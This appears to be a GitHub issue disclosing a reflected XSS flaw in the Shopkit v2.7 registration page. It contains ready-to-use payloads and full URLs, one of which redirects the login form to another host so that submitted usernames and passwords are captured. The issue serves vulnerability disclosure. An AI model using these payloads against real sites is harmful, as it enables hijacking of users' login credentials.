This repository was archived by the owner on Oct 14, 2024. It is now read-only.
This repository was archived by the owner on Oct 14, 2024. It is now read-only.
Login hijacking in register #223
Closed
Description
In the latest version v2.7
First,I found a reflective XSS vulnerability in register.
The payload is:
"><img/src=x+onerror=alert("XSS_vulnerability")><xss="
https://shopkit.samnabi.com/account/register?email="><img/src=x+onerror=alert("XSS_vulnerability")><xss="
Then,I fount this XSS vulnerability could cause login hijacking
The payload is:
"><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d"
https://shopkit.samnabi.com/account/register?email="><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d"
When the user enters a username via this link,as shown below
The username and password will be submitted to my link.
Metadata
Metadata
Assignees
Labels
No labels


